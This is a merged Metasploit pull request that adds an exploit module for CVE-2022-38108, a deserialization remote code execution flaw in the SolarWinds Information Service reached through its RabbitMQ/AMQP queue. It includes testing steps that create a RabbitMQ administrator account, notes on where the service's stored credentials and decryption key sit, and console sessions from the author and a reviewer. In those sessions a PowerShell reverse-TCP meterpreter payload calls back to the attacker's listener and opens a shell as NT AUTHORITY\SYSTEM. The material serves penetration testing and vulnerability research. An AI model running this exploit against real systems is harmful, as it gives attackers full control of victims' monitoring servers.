### PR TITLE
Add Exploit for CVE-2022-38108 Authenticated SolarWinds Information Service Deserialization RCE

### PR DESCRIPTION
**Pull request by zeroSteiner**
# Overview
This adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform's SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. SolarWinds seems to create an Orion account at install time that it uses for connecting to this service. ~~I'm still looking into how an attacker may recover these credentials instead of having to add their own, which of course, isn't really practical.~~ The original `orion` password is stored in the `CredentialProperty` database table. The value is encrypted with AES-128-CBC and the decryption key is stored in `C:\ProgramData\SolarWinds\KeyStorage\CryptoHelper\default.dat`. The decryption key itself is stored with permissions such that the file can not be read by administrative users, and the contents are protected with the [`CryptUnprotectData`](https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptunprotectdata) Win32 API.

For whoever tests this, I intend to PR a couple more AMQP-related modules once this is done, so if you could hold on to your testing environment, that'd be great.

## No Check Method
There is no check method. The reason is that the exploit only communicates with the AMQP (RabbitMQ) server and never directly with SWIS itself. That means we can't really fingerprint SWIS without (and I haven't confirmed this) making connections with additional protocols such as HTTP. Since AMQP is a protocol used by external services, having nothing to do with SWIS, and the vulnerability itself technically isn't in the RabbitMQ server it doesn't really make sense even to return "Service Detected" as the status of the check method.

## SSL Socket Issues
This requires the changes from https://github.com/rapid7/rex-socket/pull/58 for connections over SSL to work. Without that patch, the multiple calls to `#get_once` with the timeout stall and then fail when the server closes the connection.

## ObjectDataProvider
This adds the new ObjectDataProvider .NET deserialization gadget chain. This is the first of its kind to be added to our library that is not built on the binary [MS-NRBF](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5) standard. Because of this, a few checks were added to filter on compatibility with the originals. The ObjectDataProvider gadget chain is the first and only of its kind to support the newly added Json.NET formatter as well. Adding this chain and formatter to the existing library, does ensure that in the future, additional exploits can access it by name as if it were any other .NET deserialization gadget.

# Testing

- [ ] Pull down and install a copy of Solarwinds-Orion-NPM-2020.2.6: https://downloads.solarwinds.com/solarwinds/OfflineInstallers/RTM/NPM/Solarwinds-Orion-NPM-2020.2.6-OfflineInstaller.iso
- [ ] Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)
   - [ ] After installation is complete, create an AMQP account so you know the credentials. The default account is `orion`.
   - [ ] Open a command prompt in `C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>`
   - [ ] Run: `.\rabbitmqctl.bat add_user "hax" "Password1!"`
   - [ ] Run: `.\rabbitmqctl.bat set_permissions hax .* .* .*`
   - [ ] Run: `.\rabbitmqctl.bat set_user_tags hax administrator`
- [ ] Start msfconsole
- [ ] Do: `use explit/windows/misc/solarwinds_amqp_deserialization`
- [ ] Set the `RHOSTS`, `USERNAME`, `PASSWORD`, `PAYLOAD` and payload related-options
- [ ] Do: `run`
- [ ] You should get a shell.

Since I wrote the protocol stack, it'd also be a good idea to run it through error conditions to ensure stack traces aren't displayed to the user when running the module. I tested the following error conditions:

* RHOST / RPORT is wrong
* The SSL setting is incorrect (should be true and is false, should be false and is true)
* The connection is to a service other than RabbitMQ
* The credentials are invalid
* The vhost is incorrect (the exploit uses the default, but if you connect to a non-SWIS AMQP server it could happen)

## Demo

```
msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >
```

### CODE REVIEW

**Comment by kernelsmith** [comment]
Wow, that not just a simple new exploit module. That's some serious work. Impressive @zeroSteiner !

File: lib/rex/proto/amqp/version_0_9_1/client.rb [hunk 1]
```diff
@@ -0,0 +1,353 @@
...
+
+  # Build a SASL authentication response for a username and password.
+  #
+  # @param [String] username
+  # @param [String] password
+  # @return [String]
+  def build_sasl_response_plain(username, password)
+    # per the SASL spec, username and password must be UTF-8 encoded
+    # see: https://www.rfc-editor.org/rfc/rfc4616#section-2
+    "\x00".b + username + "\x00".b + password
```
Comment (jmartin-r7) [inline lib/rex/proto/amqp/version_0_9_1/client.rb:335]: Based on the comments above, should this ensure the strings here are already `UTF-8`?

**Review by space-r7 — APPROVED** [review]
Tested against version `2020.2.6`, and it worked great.

```
msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set rhost 192.168.140.150
rhost => 192.168.140.150
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set username blah
username => blah
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set password S3cureP@ssword
password => S3cureP@ssword
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > options

Module options (exploit/windows/misc/solarwinds_amqp_deserialization):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  S3cureP@ssword   yes       The password to authenticate with
   RHOSTS    192.168.140.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                        s/using-metasploit.html
   RPORT     5671             yes       The target port
   USERNAME  blah             yes       The username to authenticate with


Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.140.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] 192.168.140.150:5671 - Successfully connected to the remote server.
[*] 192.168.140.150:5671 - Successfully published the message to the channel.
[*] Sending stage (175686 bytes) to 192.168.140.150
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.150:51111) at 2023-03-27 11:51:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-5FD819S
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

Also tested with some invalid options as suggested, and received the expected output:
<details><summary>Output</summary>

```
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set rport 5672
rport => 5672
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4223
[*] Started reverse TCP handler on 192.168.140.1:4444 
[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.140.150:5672).
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set rport 5671
rport => 5671
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set username hax
username => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4182
[*] Started reverse TCP handler on 192.168.140.1:4444 
[-] Exploit aborted due to failure: no-access: Authentication failed for user hax.
[*] Exploit completed, but no session was created.
```

</details>

**Comment by space-r7** [comment]
## Release Notes

This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

**Pull request merged**